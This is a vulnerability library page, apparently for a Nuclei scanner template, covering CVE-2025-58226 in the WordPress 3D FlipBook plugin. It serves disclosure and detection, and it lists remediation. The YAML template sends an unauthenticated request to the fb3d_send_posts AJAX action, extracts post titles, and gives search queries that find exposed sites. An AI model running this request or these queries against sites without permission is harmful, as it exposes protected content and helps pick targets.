/Vulnerability Library

WordPress 3D FlipBook Plugin <= 1.16.17 - Sensitive Information Exposure

CVE-2025-58226
Verified

Description

The 3D FlipBook WordPress plugin (≤ v1.16.17) has a vulnerability where an unauthenticated AJAX action (fb3d_send_posts) exposes sensitive data. Attackers can access all flipbook posts—including password-protected content, metadata, PDF URLs, and plugin settings—without authorization.

Severity

Medium

Published Date

April 23, 2026

Template Author

pussycat0x

CVE-2025-58226.yaml
id: CVE-2025-58226

info:
  name: WordPress 3D FlipBook Plugin <= 1.16.17 - Sensitive Information Exposure
  author: pussycat0x
  severity: medium
  description: |
    The 3D FlipBook WordPress plugin (≤ v1.16.17) has a vulnerability where an unauthenticated AJAX action (fb3d_send_posts) exposes sensitive data. Attackers can access all flipbook posts—including password-protected content, metadata, PDF URLs, and plugin settings—without authorization.
  impact: |
    Attackers can retrieve embedded sensitive data, leading to information disclosure.
  remediation: Update to the latest version.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/interactive-3d-flipbook-powered-physics-engine/
    - https://patchstack.com/database/wordpress/plugin/interactive-3d-flipbook-powered-physics-engine/vulnerability/...
    - https://plugins.svn.wordpress.org/interactive-3d-flipbook-powered-physics-engine/
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/interactive-3d-flipbook-powered-physics-engine/"
    fofa-query: body="/wp-content/plugins/interactive-3d-flipbook-powered-physics-engine/"
  tags: cve,cve2025,wordpress,wp-plugin,3d-flipbook,exposure,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=fb3d_send_posts"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"code":'
          - '"posts":'
          - '"title":'
          - '"post_type":"3d-flip-book"'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200

    extractors:
      - type: json
        name: post_titles
        part: body
        json:
          - '.posts[].title'
        internal: true
# digest: 4a0a00473045022070c59b98e2673c793eff85e628264960d71038fa3cf7bb2963896545f83c00c6022100d6d3a579f9ea62664e6a8ed61db47c7aa9265a441acfb80cbf96fc1ae346acbb:922c64590222798bb761d5b6d8e72950
5.0Severity

CVSS Metrics

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/interactive-3d-flipbook-powered-physics-engine/https://patchstack.com/database/wordpress/plugin/interactive-3d-flipbook-powered-physics-engine/vulnerability/...https://plugins.svn.wordpress.org/interactive-3d-flipbook-powered-physics-engine/

Remediation Steps

Update to the latest version.